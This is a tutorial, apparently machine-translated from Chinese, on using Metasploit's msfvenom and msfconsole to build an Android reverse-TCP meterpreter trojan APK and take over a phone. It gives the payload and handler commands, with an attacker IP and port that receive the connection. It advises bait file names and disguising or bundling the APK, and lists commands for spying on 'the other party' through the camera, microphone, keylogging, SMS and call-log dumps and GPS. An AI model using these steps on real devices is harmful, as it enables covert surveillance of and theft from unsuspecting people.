Industrial Equipment

Kali Linux uses MSF to hack into Android phones

1. What is msf
msfvenom a Metasploit standalone payload generator, Also a replacement for msfpayload and msfencode. It is a software used to generate backdoors.
MSFvenom is a combination of Msfpayload and Msfencode, putting both tools in one Framework instance. Since June 8, 2015, msfvenom replaced msfpayload and msfencode.

demo environment
Demo operation with Kali 2021.3
Target machine: MEmu Android 7.1.2 emulator
Software: msfvenom, msfconsole (built-in in Kali system)

2. Infiltration process
1. Enter administrator mode
Command: sudo su
Explanation: If you are not running in administrator mode, you may be prompted that you have insufficient permissions. In order to avoid command execution failure, run the following command under administrator mode
在这里插入图片描述

Tip: Enter the Kali password after executing the command, the password is hidden, just enter it directly and press Enter

2. Generate an executable Trojan file
Command: msfvenom -p android/meterpreter/reverse_tcp LHOST=<local ip> LPORT=<local port number> R > <file name>.apk
Example: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
Explanation: Local ip writes your own Kali’s IP address, and you can check your own Kali’s IP address with ifconfig
The local port can be set to an unoccupied port number by itself. If the port number is occupied, the file will fail to be generated. Change the port number and it will be fine.
You can write any name you like in the file name, such as writing free likes, which may make it easier for the target host to take the bait
kali主机的IP地址

This is the IP address of the Kali host

Next run the command to generate a Trojan

在这里插入图片描述

The default generated files are in the root directory

在这里插入图片描述

Put the Android backdoor just generated into the target machine

3. Run the msfconsole command
Command: msfconsole

在这里插入图片描述

4. Configuration parameters
(1) Command: use exploit/multi/handler (select module)
(2) Command: set payload android/meterpreter/reverse_tcp (select attack module)
(3) Command: set LhOST 192.168.32.1 (fill in the IP address of your own host)
(4) Command: set lport 5555 (fill in the port number when the file was just generated)
(5) Command: show options (view setting parameters)
(6) Command: exploit -z -j (background execution)

After the parameters are set, open the program on the target machine and execute the command in step 6. You can also directly enter the command exploit to start the attack. As long as the target machine has installed the backdoor software, you can use any method, and you can run it directly to start the attack.

Detailed attack configuration parameter demonstration:
在这里插入图片描述

Now wait for the target machine to open the APP

5. Open the executable file on the target machine

在这里插入图片描述

We can also disguise this program here, change its icon, or bundle it with some software, and when the user opens it, it will be automatically installed on the other party’s computer

6. View users
(1) Command: sessions (view hooked users)
(2) Command: sessions -i 1 (select the user to attack)

在这里插入图片描述

Once the meterpreter appears, you have successfully invaded

3. Meterpreter invades Android phone commands
1. Check the phone system information of the other party
Command: sysinfo

在这里插入图片描述

2. Check which app files are installed on the other party’s mobile phone
Command: app_list

3. Remotely control the other party’s mobile phone to take a photo
Command: webcam_snap

4. Remotely control the other party’s mobile phone to start video chat
Command: webcam_chat

5. Check the information of the other party’s mobile phone in real time
Command: dump_sms

在这里插入图片描述

6. Obtain the address book of the other party’s mobile phone
Command: dump_calllog

在这里插入图片描述

7. Obtain the GPS location of the other party’s mobile phone in real time
Command: geolocate

在这里插入图片描述

8. More commands
You can also view the help documentation, command help

cmd command:
cat reads the contents of a file to the screen
cd change directory
checksum retrieves the checksum of a file
cp copies source to destination
del delete the specified file
dir list files (alias for ls)
Download Download a file or directory
edit edit file
getlwd prints the local working directory
getwd print working directory
lcd Change local working directory
lls list local files
lpwd prints the local working directory
ls list files
mkdir creates a directory
mv moves source to destination
pwd print working directory
rm deletes the specified file
rmdir delete directory
search Search files
show_mount lists all mount points/logical drives
upload upload file or directory
pkill kills a process by name

meterpreter command:
keyscan_start start capturing keystrokes (start keylogging)
keyscan_dump dump key buffer (download keylogger)
keyscan_stop Stop capturing keystrokes (stop keylogging)
record_mic X seconds to record audio from the default microphone record_mic (audio recording)
webcam_chat Start video chat (video, the other party will have a pop-up window)
webcam_list single camera (view camera list)
webcam_snap takes a snapshot from the specified webcam (camera takes a picture)
webcam_stream Play video stream from specified camera (enable camera monitoring)
enumdesktops list all accessible desktops and window stations (form list)
getdesktop Get the current Meterpreter desktop
reboot Reboots the remote computer
shutdown Shut down the remote computer
shell into the system command shell
enumdesktops lists all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime returns the number of seconds the remote user has been idle
keyboard_send send keystrokes
keyevent Send key event
keyscan_dump Dump the keystroke buffer
keyscan_start start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse sends mouse events
screenshare watch remote user desktop in real time
screenshot Takes a screenshot of the interactive desktop
setdesktop Change Meterpreters current desktop
uictl controls some user interface components
record_mic record audio from default microphone for X seconds
webcam_chat start video chat
webcam_list list webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream plays the video stream from the specified webcam
play Plays a wave audio file (.wav) on the target system
getsystem attempts to elevate your privileges to those of the local system
execute -f notepad open notepad

Upload the file to the target machine command
请添加图片描述

Download the file to the host command

在这里插入图片描述